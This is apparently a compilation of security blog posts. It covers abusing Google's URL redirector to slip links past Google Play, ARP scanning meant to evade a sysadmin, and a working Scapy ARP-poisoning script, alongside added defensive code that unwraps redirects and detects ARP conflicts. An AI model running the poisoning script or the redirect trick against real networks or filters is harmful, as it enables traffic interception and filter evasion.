Using Google to redirect to a URL

Google uses ‘https://www.google.com/url’ to redirect and track clicks in its search results. We can use that endpoint to redirect to anywhere through Google’s system, and Google Play will not reject such a URL because it originates from Google’s domain name.

You can use Google’s URL redirection service to create a Google URL which will redirect to your desired address.

Let’s say we want to create a redirection for the URL https://www.aviran.org through Google. The first stage is to search for that URL in Google’s search engine.
The first result links to the URL we want; we will use that result for our redirection.

As I explained before, the search results Google displays do not link directly to the URL they show. All the results are links to ‘https://www.google.com/url’ with additional query-string variables carrying the redirection info. In our example, when searching for www.aviran.org, the first result that links to www.aviran.org actually links to:

http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&ved=0CC0QFjAA&url=http%3A%2F%2Fwww.aviran.org%2F&ei=t2VQUreoCpHE4gTBsoCADQ&usg=AFQjCNGhf8lO9od6sdHlrMLXuWZ2AD0qzA&sig2=Y11U7GSqZAKFBtvcq4dRFw&bvm=bv.53537100,d.bGE

We can work with that to create a less crude URL for our needs: we can get rid of most of the GET variables. The variables we have to keep are sa, url and usg, with their values.


After removing the unnecessary GET variables we are left with:
http://www.google.com/url?sa=t&url=http%3A%2F%2Fwww.aviran.org%2F&usg=AFQjCNGhf8lO9od6sdHlrMLXuWZ2AD0qzA

A Google URL which will lead to www.aviran.org – Mission Accomplished!
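The same redirector is what a defender has to deal with when links are allowlisted by domain: a link that starts with www.google.com/url is not a link to Google. The following Python is an added example, not code from the original post. It unwraps the url parameter of google.com/url links without touching the network and applies the allowlist to the real destination instead of the wrapper. The REDIRECTORS table (host to path and parameter name) and the allowlist are assumptions made for this example; the sample link is the one from the post.

```python
from urllib.parse import urlparse, parse_qs

# Known redirector endpoints: hostname -> (path, query parameter carrying the
# real destination). The google.com/url entry follows the post above; the shape
# of this table is an assumption for this example, not a documented Google API.
REDIRECTORS = {
    "www.google.com": ("/url", "url"),
    "google.com": ("/url", "url"),
}

# The link from the post, after the unnecessary parameters were removed.
PAGE_LINK = ("http://www.google.com/url?sa=t&url=http%3A%2F%2Fwww.aviran.org%2F"
             "&usg=AFQjCNGhf8lO9od6sdHlrMLXuWZ2AD0qzA")


def unwrap_redirect(link, max_hops=3):
    """Return the URL a known redirector ultimately points at, without
    touching the network. Stops after max_hops so a chain of wrappers
    cannot loop forever; links to unknown hosts are returned unchanged."""
    current = link
    for _ in range(max_hops):
        parsed = urlparse(current)
        entry = REDIRECTORS.get(parsed.hostname)
        if entry is None or parsed.path != entry[0]:
            return current
        # parse_qs percent-decodes, so http%3A%2F%2F... becomes http://...
        dest = parse_qs(parsed.query).get(entry[1])
        if not dest:
            return current
        current = dest[0]
    return current


def effective_host(link):
    """Hostname of the real destination, or None if it cannot be determined
    (for example a relative url= value), which callers should treat as a block."""
    return urlparse(unwrap_redirect(link)).hostname


def is_allowed(link, allowed_hosts):
    """Allowlist check applied to the destination, not to the wrapper."""
    host = effective_host(link)
    return host is not None and host.lower() in allowed_hosts


if __name__ == "__main__":
    for link in (PAGE_LINK, "https://www.google.com/search?q=aviran.org"):
        print(link, "->", effective_host(link),
              "allowed" if is_allowed(link, {"www.google.com"}) else "blocked")
```

With an allowlist of just www.google.com, the post’s link is blocked because its destination is www.aviran.org, while an ordinary Google search link is allowed. A relative or missing destination resolves to no hostname and is blocked rather than passed through.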

ARP ping with Python and Scapy

Usually we use the ping command to check whether a machine exists at the address we ping; if we get a reply (Pong!) we know there’s a machine at that address. The traditional ping uses the ICMP protocol and sends icmp-echo-request (Ping) and icmp-echo-reply (Pong) packets. A machine can choose to ignore echo requests and not reply in order to hide itself.

We can instead use the ARP protocol, which resolves the MAC addresses of hosts, to ping machines on a local area network. Since a host has to answer ARP requests in order to communicate on the LAN at all, this technique can map a LAN in a less obvious way, in the hope of avoiding detection by a diligent sysadmin.

Here’s a Python script that uses the Scapy library to perform an ARP ping on a single target.

#!/usr/bin/env python3

# Sends an ARP resolution request on broadcast for an IP address.
# If a reply is received within the timeout, the host is alive.
# aviran.org

from scapy.all import Ether, ARP, srp
import sys

TIMEOUT = 2  # seconds to wait for a reply

if len(sys.argv) != 2:
    print("Usage: arp_ping.py IP")
    sys.exit(1)

# Ethernet broadcast frame carrying an ARP who-has for the target IP.
# srp() sends at layer 2 and returns (answered, unanswered) packet lists.
answered, unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=sys.argv[1]),
                           timeout=TIMEOUT, verbose=False)

if len(answered) > 0:
    # answered[0] is a (sent, received) pair; the reply's hwsrc is the target's MAC
    sent, received = answered[0]
    print(sent.getlayer(ARP).pdst, "is up at", received.getlayer(ARP).hwsrc)
elif len(unanswered) > 0:
    print(unanswered[0].getlayer(ARP).pdst, "is down")

ARP poisoning using Python and Scapy

What is ARP poisoning
Machines on a TCP/IP local area network identify each other and communicate using the physical addresses of their network adapters (MAC addresses). Every machine keeps a list (cache) of neighboring machines and their MAC addresses. If that list is contaminated, i.e. a machine on that list is stored with the wrong MAC address, all communication to that machine will be directed to the wrong machine.
ARP poisoning is the method of tricking a machine into saving an entry for an IP address with the wrong MAC address in its ARP table.

How the script works
The following script gets two arguments:
HOST_TO_ATTACK – the machine we want to poison
HOST_TO_IMPERSONATE – the machine we want the poisoned machine to think we are, so that when it wants to communicate with that machine, it will actually communicate with us.

The script queries the target machine for its MAC address by sending a who-has packet to broadcast.
The who-has packet has a fake source IP address coupled with the attacker’s MAC address.
When the target gets the who-has packet, it will store the false IP and MAC address pair in its ARP table.

#!/usr/bin/env python3

# Python ARP poison example script
# Written by aviran
# visit for more details aviran.org

from scapy.all import Ether, ARP, sendp, get_if_list, get_if_hwaddr
import sys


def get_mac_address():
    # First interface with a real hardware address (loopback reports all zeros)
    my_macs = [get_if_hwaddr(i) for i in get_if_list()]
    for mac in my_macs:
        if mac != "00:00:00:00:00:00":
            return mac
    return None


if len(sys.argv) != 3:
    print("Usage: arp_poison.py HOST_TO_ATTACK HOST_TO_IMPERSONATE")
    sys.exit(1)

my_mac = get_mac_address()
if not my_mac:
    print("Can't get local MAC address, quitting")
    sys.exit(1)

# who-has request that pairs HOST_TO_IMPERSONATE's IP with our own MAC;
# Ether() defaults to the broadcast destination address.
packet = Ether() / ARP(op="who-has", hwsrc=my_mac, psrc=sys.argv[2], pdst=sys.argv[1])

sendp(packet)
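Both scripts above rely on hosts updating their ARP cache from whatever who-has or is-at frames they see, and that is also what a defender can watch for: an IP address that is suddenly claimed by a second MAC address. The following Python is an added example, not code from the original post, and it does not use Scapy so it runs offline. It parses raw Ethernet/ARP frames with struct, keeps its own IP-to-MAC table and raises an alert on a conflict, checking who-has requests as well as replies because the poisoning script above sends a request rather than a reply. The frame builder, the addresses and the "known good" gateway binding are constructed for the demo.

```python
import struct
from ipaddress import IPv4Address

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2   # "who-has" and "is-at" in Scapy's terms


def mac_to_bytes(mac):
    return bytes(int(octet, 16) for octet in mac.split(":"))


def bytes_to_mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_frame(op, sha, spa, tha, tpa, eth_dst="ff:ff:ff:ff:ff:ff"):
    """Build a raw Ethernet II + ARP frame (RFC 826 layout). Used here only to
    construct sample traffic for the monitor; a real deployment would read
    frames from a capture file or a raw socket instead."""
    ethernet = mac_to_bytes(eth_dst) + mac_to_bytes(sha) + struct.pack("!H", ETHERTYPE_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)   # Ethernet/IPv4, 6-byte MAC, 4-byte IP
           + mac_to_bytes(sha) + IPv4Address(spa).packed
           + mac_to_bytes(tha) + IPv4Address(tpa).packed)
    return ethernet + arp


def parse_arp_frame(frame):
    """Return the ARP fields of an Ethernet frame, or None if it is not an
    Ethernet/IPv4 ARP frame of the expected size."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "op": op,
        "sha": bytes_to_mac(frame[22:28]),
        "spa": str(IPv4Address(frame[28:32])),
        "tha": bytes_to_mac(frame[32:38]),
        "tpa": str(IPv4Address(frame[38:42])),
    }


class ArpMonitor:
    """Track sender-IP -> sender-MAC bindings and flag any change to them."""

    def __init__(self, known_bindings=None):
        self.bindings = dict(known_bindings or {})   # static entries are kept as-is
        self.alerts = []

    def observe(self, frame):
        pkt = parse_arp_frame(frame)
        if pkt is None or pkt["spa"] == "0.0.0.0":
            return None   # not ARP, or an ARP probe that claims no address
        previous = self.bindings.get(pkt["spa"])
        if previous is None:
            self.bindings[pkt["spa"]] = pkt["sha"]   # first sighting: learn it
            return None
        if previous != pkt["sha"]:
            kind = "who-has" if pkt["op"] == ARP_REQUEST else "is-at"
            alert = (f"ARP conflict: {pkt['spa']} known as {previous}, "
                     f"now claimed by {pkt['sha']} in a {kind} frame")
            self.alerts.append(alert)
            return alert
        return None


if __name__ == "__main__":
    # Constructed demo: a legitimate gateway frame, then a frame shaped like
    # the poisoning script's output (who-has with the gateway IP as sender).
    GATEWAY_IP, GATEWAY_MAC = "10.0.0.1", "aa:bb:cc:00:00:01"
    OTHER_MAC = "de:ad:be:ef:00:02"
    monitor = ArpMonitor({GATEWAY_IP: GATEWAY_MAC})
    frames = [
        build_arp_frame(ARP_REQUEST, GATEWAY_MAC, GATEWAY_IP, "00:00:00:00:00:00", "10.0.0.7"),
        build_arp_frame(ARP_REQUEST, OTHER_MAC, GATEWAY_IP, "00:00:00:00:00:00", "10.0.0.7"),
    ]
    for frame in frames:
        print(monitor.observe(frame) or "ok")
```

The monitor never overwrites a binding it already holds, so a poisoned who-has produces an alert rather than silently replacing the gateway entry; seeding it with static bindings for the gateway and other critical hosts is what makes the first sighting trustworthy. It deliberately ignores probes with a 0.0.0.0 sender, which claim no address and would otherwise produce noise.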

An easy way to get all the link URLs of a webpage

Open the JavaScript console in your browser: if you’re using Chrome, hit CTRL+SHIFT+J; if you’re using Firefox, CTRL+SHIFT+K will display the console.

Input the following code and you will get a list of the addresses all the HTML anchors point at.

// document.links is a live collection of every <a> and <area> element with an href
const links = document.links;
for (let i = 0; i < links.length; i++) {
   console.log(links[i].href);
}

links[i] is an HTMLAnchorElement; if you need something other than the href, just read a different property of the HTMLAnchorElement.